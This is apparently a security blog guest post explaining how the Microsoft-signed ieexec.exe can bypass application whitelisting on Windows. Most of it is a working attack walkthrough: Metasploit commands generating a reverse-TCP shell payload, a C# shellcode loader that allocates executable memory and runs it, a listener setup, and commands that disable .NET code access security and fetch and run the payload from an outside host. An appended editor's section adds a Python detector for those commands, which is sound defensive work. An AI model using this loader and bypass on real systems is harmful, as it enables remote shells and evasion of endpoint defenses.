Application Whitelist Bypass using IEexec.exe


Guest post by @infosecsmith2

There was a recent presentation at DerbyCon, entitled:

Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber

I highly recommend that you start with this presentation as it lays the foundation for this post.

The premise is: how can we maintain persistence in a corporate environment using only the tools and defaults that ship with the host OS we have compromised? This is a very important concept given the shift in many organizations toward an Application Whitelisting defense model.

It is only a matter of time before you encounter an Application Whitelisting defense.

As a follow-up to that presentation, I began exploring the binaries that ship by default with Windows. That is where I stumbled across a binary in the C:\Windows\Microsoft.NET\Framework64\v2.0.50727 path.

The executable is ieexec.exe. Microsoft's write-up is here: http://support.microsoft.com/kb/822485

“The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.”

Excellent! So now we just need to host our malicious binary and call it from ieexec.exe.

This is great, since most Application Whitelisting environments are going to "trust" anything signed by Microsoft as a matter of convenience. IEexec.exe will download and execute our code for us, all under the trusted process.

So let's get started!

Step 1. Prepare your shellcode, or whatever malicious app you want. I compiled my executable using SharpDevelop, since it has a smaller footprint than a full-blown Visual Studio install. From msfconsole:

msf > use windows/x64/shell/reverse_tcp
msf payload(reverse_tcp) > set LHOST x.x.x.x
msf payload(reverse_tcp) > set LPORT 443
msf payload(reverse_tcp) > generate -t csharp
byte[] buf = new byte[422] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...<Snipped Full ShellCode for Brevity>

Step 2. Create the .NET wrapper application

using System;
using System.Runtime.InteropServices;

namespace native
{
    class Program
    {
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        private static UInt32 MEM_RELEASE = 0x8000;

        public static void Main(string[] args)
        {
            // native function's compiled code
            byte[] proc = new byte[] {
                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52... //Edited ShellCode For Brevity
            };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // prepare data
            PROCESSOR_INFO info = new PROCESSOR_INFO();
            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
            Marshal.StructureToPtr(info, pinfo, false);

            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // retrieve data
            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
            Marshal.FreeHGlobal(pinfo);
            CloseHandle(hThread);
            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
        }

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(string moduleName);
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(string lpFileName);
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESSOR_INFO
        {
            public UInt32 dwMax;
            public UInt32 id0;
            public UInt32 id1;
            public UInt32 id2;
            public UInt32 dwStandard;
            public UInt32 dwFeature;
            // if AMD
            public UInt32 dwExt;
        }
    }
}

You will want to compile the exe for the target platform; in this case I am going for an x64 target. Also, you will want to compile against the .NET Framework 2.0 or 3.5.

Step 3. Host the Exe. For this example, I used Mongoose. Simple and Effective:

http://code.google.com/p/mongoose/

By default Mongoose listens on port 8080; this is configurable. Simply place your compiled binary from step 2 into the same directory as Mongoose. Start Mongoose and you are almost ready to deliver your payload.

Step 4. Setup your receiver:

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set PAYLOAD windows/x64/shell/reverse_tcp
msf exploit(handler) > exploit -j

Step 5. On the host that is protected by whitelisting, open two command prompts as administrator.

CMD 1 Execute:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s off

CMD 2 Execute:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>ieexec.exe http://x.x.x.x:8080/bypass.exe

There is some detail to unpack here, which I can go over later, as to why we need to run caspol.exe. Here is the behavior I saw in our experimentation with this.

Initial attempt to run our rogue binary fails, since it is unknown/untrusted/unapproved:

Now, on the same host…

Executes just fine!

It's important to distinguish what this technique is and what it is not. This is not an exploit or a vulnerability; rather, it is one way to execute arbitrary code in an Application Whitelisting environment.
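From the defender's side, the two commands in step 5 are the visible footprint of this technique: caspol.exe being used to switch code access security off, followed shortly by ieexec.exe being handed a URL. The following is an added detection example (editor's code, not part of the original post or the author's tooling) that runs those two rules over process-creation records and correlates them. The pipe-delimited record format and the sample events are constructed for the example; in practice the same fields (image path, command line, parent image, timestamp) come from Sysmon Event ID 1 or Windows Security event 4688 with command-line logging enabled.

```python
"""Flag caspol.exe -s off and ieexec.exe <URL> in process-creation records, then correlate them."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

# Constructed sample telemetry (not real logs): "timestamp|image|command_line|parent_image".
SAMPLE_EVENTS = """\
2013-10-02T14:01:07Z|C:\\Windows\\System32\\cmd.exe|cmd.exe|C:\\Windows\\explorer.exe
2013-10-02T14:01:22Z|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\caspol.exe|caspol.exe -s off|C:\\Windows\\System32\\cmd.exe
2013-10-02T14:01:40Z|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe|ieexec.exe http://x.x.x.x:8080/bypass.exe|C:\\Windows\\System32\\cmd.exe
2013-10-02T14:05:03Z|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\caspol.exe|caspol.exe -l|C:\\Windows\\System32\\cmd.exe
2013-10-02T14:07:15Z|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt|C:\\Windows\\explorer.exe
"""


@dataclass
class Event:
    ts: datetime
    image: str
    cmdline: str
    parent: str


@dataclass
class Finding:
    ts: datetime
    rule: str
    event: Event


# ieexec.exe is only interesting when it is asked to fetch something by URL.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# caspol accepts both the short and long form of the security switch.
CASPOL_OFF_RE = re.compile(r"(?:^|\s)-(?:s|security)\s+off\b", re.IGNORECASE)


def parse_events(text: str) -> List[Event]:
    """Parse the constructed pipe-delimited format into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, image, cmdline, parent = line.split("|", 3)
        events.append(Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), image, cmdline, parent))
    return events


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Event]) -> List[Finding]:
    """Apply the two per-event rules and return every hit in time order."""
    findings = []
    for e in sorted(events, key=lambda ev: ev.ts):
        name = basename(e.image)
        if name == "ieexec.exe" and URL_RE.search(e.cmdline):
            findings.append(Finding(e.ts, "ieexec_url_launch", e))
        elif name == "caspol.exe" and CASPOL_OFF_RE.search(e.cmdline):
            findings.append(Finding(e.ts, "caspol_security_off", e))
    return findings


def correlated(findings: List[Finding], window: timedelta = timedelta(minutes=10)) -> bool:
    """True when a caspol_security_off precedes an ieexec_url_launch within `window`.

    Either rule alone can fire on legitimate admin activity; both in sequence on one
    host is the pattern described in the post and deserves a higher severity.
    """
    offs = [f.ts for f in findings if f.rule == "caspol_security_off"]
    for f in findings:
        if f.rule == "ieexec_url_launch" and any(timedelta(0) <= f.ts - t <= window for t in offs):
            return True
    return False


if __name__ == "__main__":
    hits = evaluate(parse_events(SAMPLE_EVENTS))
    for h in hits:
        print(f"{h.ts.isoformat()} {h.rule}: {h.event.cmdline} (parent {basename(h.event.parent)})")
    print("correlated sequence:", correlated(hits))
```

Running the block on the constructed sample reports the caspol and ieexec events and marks them as a correlated sequence; the `caspol.exe -l` listing and the other processes are left alone. The image-path check matters as much as the command line: whitelisting by publisher treats ieexec.exe as trusted, so a path- or hash-based deny rule on the two .NET framework directories is the matching preventive control, and this rule is the alert you keep in case that control is missing.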

Summary:

In this document we learned that even when a host is in a mode where only trusted, approved applications can run, IEexec.exe can in certain situations be used to circumvent a whitelist, since it is likely to be a trusted binary by virtue of being signed by Microsoft.

Cheers,

=>@infosecsmith2
